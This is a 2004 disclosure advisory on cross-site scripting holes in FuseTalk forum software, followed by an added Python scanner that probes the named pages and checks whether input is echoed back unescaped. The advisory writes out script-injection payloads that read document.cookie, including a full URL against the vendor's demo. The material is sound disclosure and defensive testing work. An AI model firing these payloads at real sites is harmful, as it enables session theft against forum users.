Date: October 12, 2004
Vendor: FuseTalk
Issue: Multiple Cross Site Scripting Vulnerabilities
URL: http://www.fusetalk.com
Advisory: http://www.lovebug.org/fusetalk_advisory.txt

Notes:

The vendor was contacted last month and responded that:

"All of these issues below were fixed in "Security Patches" released 04/21/2004 & 05/04/2004. All customers were notified of these and were to apply them. The site you are visiting obviously has not applied these patches and should. If you are not the person in charge of the site you visit, you might want them to email me at sales [AT] fusetalk.com and I can let them know where to go and get those patches."

However, a large number of sites running FuseTalk are still vulnerable, and even the Enterprise Edition demo on the vendor's own homepage is currently vulnerable. It would appear that these patches are not making their way around very well and/or do not fix all of the problems listed below.

Issue:

I am not 100% sure which version the vulnerable sites I found are running, or whether the vulnerabilities exist in all similar versions of FuseTalk. It is possible that some level of customization has occurred and introduced the vulnerability. In any case, I will explain the circumstances in which the problem can be recreated as I found it. Finally, the FuseTalk website itself contains a CSS (cross-site scripting, XSS) vulnerability in the latest FuseTalk Enterprise Edition demo. It would appear FuseTalk Enterprise Edition 2.0 and other versions are all affected.

1) The data sent to searchresults.cfm does not appear to be filtered. Sending it a search string such as <script>alert(document.cookie)</script> will yield a popup with the cookie data.

2) In some forums (often older versions), when viewing the profile of a user, if script code is passed in tombstone.cfm?ProfileID, i.e.
(tombstone.cfm?ProfileID=<script>alert(document.cookie)</script>), the text is once again unfiltered and the script will be executed.

3) One of the major sites I use automatically returns an error page that does not filter and executes pretty much any script sent to any FuseTalk URL. I am not sure whether this is their own setup or a FuseTalk option; I am under the assumption it is their own 404 issue. However, if there is a setting that brings all invalid pages to a screen that says:

"Page Not Found
The web page you requested could not be found. Please check to make sure you entered the correct information."

then that makes any URL that FuseTalk processes vulnerable as well.

4) Lastly, in the Enterprise Edition demo on the vendor's website, I have only found one CSS vulnerability thus far. The error lies within usersearchresults.cfm?keyword="SCRIPT". We can recreate the same CSS problem as above with the URL:
http://www.fusetalk.com/forum/usersearchresults.cfm?keyword=<script>alert(document.cookie)</script>&FT_ACTION=SearchUsers

Solution:

It seems Spiffomatic64 reported a different CSS problem with FuseTalk earlier today, and his suggestions should apply just the same.

Credits:

Thanks to Virginia Tech for the edumucation I am receiving and to my girlfriend for being so sweet.

[SDC]
-Steven
steven@xxxxxxxxxxx
www.lovebug.org/
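The advisory's point is that a site operator cannot tell from the vendor's statement whether the patches actually landed; the only reliable check is to send the same kind of probe and see whether the server echoes it back raw. The script below is an added example written for this page, not part of the advisory and not FuseTalk's code. It builds the probe URLs for the three endpoints named above (searchresults.cfm, tombstone.cfm?ProfileID, usersearchresults.cfm?keyword with FT_ACTION=SearchUsers) plus a non-existent path for the catch-all error-page case in issue 3, and classifies each response as "unescaped" (the raw <script> tag came back, so it would execute), "escaped" (the value was reflected but HTML-encoded or stripped, which is what a patched page should do) or "absent". The marker string, the base URL, the response bodies and the assumption that searchresults.cfm takes its search string in a parameter called keyword are all constructed for the example; the advisory does not name that parameter. The network fetcher is injectable so the example runs offline against the constructed bodies.

```python
"""Reflected-XSS probe for the FuseTalk endpoints named in the advisory.

Added example, not part of the original advisory or of FuseTalk. It sends a
uniquely marked <script> payload in a query parameter (or in the request
path, for the catch-all error-page case) and classifies how the server
echoes it back: unescaped (vulnerable), escaped/stripped (patched), or absent.
"""
import html
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional

# Hypothetical marker so a reflection is unambiguous even in a large page.
MARKER = "ftxss7319"
PAYLOAD = f"<script>alert('{MARKER}')</script>"

# (page, parameter, extra query params), paths relative to the forum root.
# The parameter name for searchresults.cfm is an assumption; the advisory only
# says "search string". The other two are taken from the advisory's URLs.
ENDPOINTS = [
    ("searchresults.cfm", "keyword", {}),
    ("tombstone.cfm", "ProfileID", {}),
    ("usersearchresults.cfm", "keyword", {"FT_ACTION": "SearchUsers"}),
]


def classify_reflection(body: str, payload: str = PAYLOAD, marker: str = MARKER) -> str:
    """'unescaped' if the raw payload is echoed (script would run),
    'escaped' if the marker survives but the tags were encoded or stripped,
    'absent' if the input is not reflected at all."""
    if payload in body:
        return "unescaped"
    if marker in body:
        return "escaped"
    return "absent"


def build_query_probe(base_url: str, page: str, param: str,
                      extra: Optional[Dict[str, str]] = None) -> str:
    """Probe URL with the payload in a query parameter, e.g. ...?keyword=<script>..."""
    params = {param: PAYLOAD}
    params.update(extra or {})
    return f"{base_url.rstrip('/')}/{page}?{urllib.parse.urlencode(params)}"


def build_path_probe(base_url: str) -> str:
    """Probe URL with the payload as a non-existent path (the error-page case, issue 3)."""
    return f"{base_url.rstrip('/')}/{urllib.parse.quote(PAYLOAD, safe='')}"


def http_get(url: str) -> str:
    """Plain GET; only used when no fetcher is injected into scan()."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


def scan(base_url: str, fetch: Callable[[str], str] = http_get) -> Dict[str, str]:
    """Run every probe against a forum root; returns {probe_url: classification}."""
    results = {}
    for page, param, extra in ENDPOINTS:
        url = build_query_probe(base_url, page, param, extra)
        results[url] = classify_reflection(fetch(url))
    url = build_path_probe(base_url)
    results[url] = classify_reflection(fetch(url))
    return results


# Constructed responses imitating an unpatched and a patched results page
# (not real FuseTalk output). The patched one HTML-encodes the echoed value,
# which is what a server-side fix such as ColdFusion's HTMLEditFormat() does.
VULNERABLE_BODY = (
    "<html><body><h2>Search Results</h2>"
    f"<p>No results found for: {PAYLOAD}</p></body></html>"
)
PATCHED_BODY = (
    "<html><body><h2>Search Results</h2>"
    f"<p>No results found for: {html.escape(PAYLOAD)}</p></body></html>"
)

if __name__ == "__main__":
    base = "http://forum.example.invalid"  # hypothetical forum root
    for label, body in (("unpatched", VULNERABLE_BODY), ("patched", PATCHED_BODY)):
        print(f"== {label} site ==")
        for probe_url, verdict in scan(base, fetch=lambda _u, b=body: b).items():
            print(f"{verdict:9s} {probe_url}")
```

To check a real deployment you administer, call scan() with the forum root and the default fetcher; any "unescaped" line means the page echoes attacker-controlled input into HTML without encoding, regardless of which patch level the vendor believes is installed. The marker-based classification matters for the error-page case: a 404 handler that reflects the requested path but encodes it is harmless, so the check distinguishes "reflected" from "reflected raw" rather than treating any echo as a finding.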